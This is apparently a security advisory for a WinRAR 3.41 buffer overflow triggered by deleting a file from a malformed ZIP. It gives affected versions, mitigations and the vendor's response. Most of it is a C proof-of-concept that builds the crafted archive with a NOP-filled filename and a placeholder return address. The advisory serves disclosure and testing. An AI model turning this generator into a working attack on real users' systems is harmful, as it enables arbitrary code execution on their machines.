|
|
|
|
| |
WinRAR is "a powerful archive manager. It can backup your data and reduce size of email attachments, decompress RAR, ZIP and other files downloaded from Internet and create new archives in RAR and ZIP file format".
A vulnerability in the way WinRAR handles long filenames allows a remote attacker that is able to convince a user to try and delete a certain file from a malformed ZIP package, to cause the WinRAR program to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability. |
| |
Credit:
The information has been provided by Vafa Khoshaein.
|
| |
Vulnerable Systems:
* WinRAR version 3.41 and prior
Mitigating factors:
WinRAR truncates the file name to 1023 bytes and overflowed buffer size is 500 bytes, so maximum size of exploit code is limited to ~0.5KB. Enough to delete something, but seems to be not enough for typical Trojan or virus. Also this buffer contains "Are you sure you want to delete" string before the file name and length of this string differs in different WinRAR translations. So exploit created for English WinRAR will not work in other versions like French or Czech.
Vendor response:
We recently received the report about this WinRAR delete buffer overflow from Dark Eagle and agreed with him about delaying the disclosure until next WinRAR version, which we are going to release soon enough, in 1 - 2 months or maybe even sooner. Please do not disclose the information about this bug now, before Dark Eagle, who was first to find it.
Exploit:
/*
WinRAR 3.40 Buffer Overflow POC
Thanks to Miguel Tarasco Acuna. He has made a wonderful code for
Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)
which I edited and made this code by.
Coded by Vafa Khoshaein - vkhoshain@hotmail.com
Vulnerability discovery date : December 10, 2004
Run this code and creat vulnerable_zip.zip then open the file in WinRAR 3.40
there exists a file, Try to delete the file - SECU
*/
#include <stdio.h>
#include <windows.h>
#pragma pack(1)
#define DATOS "vkhoshain@hotmail.com"
typedef struct {
DWORD Signature;
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
}TOPHEADER;
typedef struct {
DWORD Signature;
WORD MadeVersion;
WORD VersionNeeded;
WORD GeneralPurposeFlag;
WORD CompressionMethod;
WORD ModFileTime;
WORD ModFileDate;
DWORD Crc32;
DWORD CompressedSize;
DWORD UncompressedSize;
WORD FilenameLength;
WORD ExtraFieldLength;
WORD FileCommentLength;
WORD DiskNumberStart;
WORD InternalFileAttributes;
DWORD ExternalFileAttributes;
DWORD RelativeOffsetOfLocalHeader;
}MIDDLEHEADER;
typedef struct {
DWORD Signature;
WORD NumOfThisDisk;
WORD NumDisckStartCentralDirectory;
WORD NumEntriesCentralDirOnThisDisk;
WORD TotalNumEntriesCentralDir;
DWORD SizeCentralDirectory;
DWORD OffsetCentraDirRespectStartDiskNum;
WORD ZipCommentLength;
}BOTTOMHEADER;
int main(int argc,char *argv[]) {
FILE *ZipFile;
TOPHEADER *Cabecera1;
MIDDLEHEADER *Cabecera2;
BOTTOMHEADER *Cabecera3;
DWORD c;
UINT i;
char *filename;
char *url;
printf("\nWinRAR 3.40 Buffer Overflow POC\n");
printf("\nCoded by Vafa Khoshaein (vkhoshain@hotmail.com)\n");
if (!(ZipFile=fopen("vulnerable_zip.zip","w+b"))) {
printf("\nError in creating vulnerable_zip.zip\n");
exit(1);
}
c=30800;
filename=(char*)malloc(sizeof(char)*c);
memset(filename,0,sizeof(filename));
for( i=0;i<30800;i++) filename[i]=0x90;
// Return Address
memcpy(&filename[479],"AAAA",4); /////////// Ret Addr EIP 0x41414141
Cabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));
Cabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));
Cabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));
memset(Cabecera1,0,sizeof(TOPHEADER));
memset(Cabecera2,0,sizeof(MIDDLEHEADER));
memset(Cabecera3,0,sizeof(BOTTOMHEADER));
Cabecera1->Signature=0x00000050; // DWORD
Cabecera1->VersionNeeded=0x000A; // WORD
Cabecera1->GeneralPurposeFlag=0x0002; // WORD
Cabecera1->CompressionMethod=0x0000; // WORD
Cabecera1->ModFileTime=0x1362; // WORD
Cabecera1->ModFileDate=0x3154; // WORD
Cabecera1->Crc32=0x85B36639; // DWORD
Cabecera1->CompressedSize=0x00000015; // DWORD
Cabecera1->UncompressedSize=0x00000015; // DWORD
Cabecera1->FilenameLength=(WORD)c; // WORD 0x0400
Cabecera1->ExtraFieldLength=0x0000; // WORD
Cabecera2->Signature=0x02014B50; // DWORD
Cabecera2->MadeVersion=0x0014; // WORD
Cabecera2->VersionNeeded=0x000A; // WORD
Cabecera2->GeneralPurposeFlag=0x0002; // WORD
Cabecera2->CompressionMethod=0x0000; // WORD
Cabecera2->ModFileTime=0x1362; // WORD
Cabecera2->ModFileDate=0x3154; // WORD
Cabecera2->Crc32=0x85B36639; // DWORD
Cabecera2->CompressedSize=0x00000015; // DWORD
Cabecera2->UncompressedSize=0x00000015; // DWORD
Cabecera2->FilenameLength=(WORD)c; // WORD 0x0400;//strlen(filename);
Cabecera2->ExtraFieldLength=0x0000; // WORD
Cabecera2->FileCommentLength=0x0000; // WORD
Cabecera2->DiskNumberStart=0x0000; // WORD
Cabecera2->InternalFileAttributes=0x0001; // WORD
Cabecera2->ExternalFileAttributes=0x00000020; // DWORD
Cabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORD
Cabecera3->Signature=0x06054B50; // DWORD
Cabecera3->NumOfThisDisk=0x0000; // WORD
Cabecera3->NumDisckStartCentralDirectory=0x0000; // WORD
Cabecera3->NumEntriesCentralDirOnThisDisk=0x0001;
Cabecera3->TotalNumEntriesCentralDir=0x0001;
Cabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c;
Cabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c;
Cabecera3->ZipCommentLength=0x0000;
fwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);
fwrite(filename, c, 1,ZipFile);
fwrite(DATOS,strlen(DATOS),1,ZipFile);
fwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);
fwrite(filename, c, 1,ZipFile);
fwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);
fclose(ZipFile);
printf("\nvulnerable_zip.zip has been created\n\n");
return 1;
}
//----------------------------------------------------------------------
|
|
|
|
|
|
|
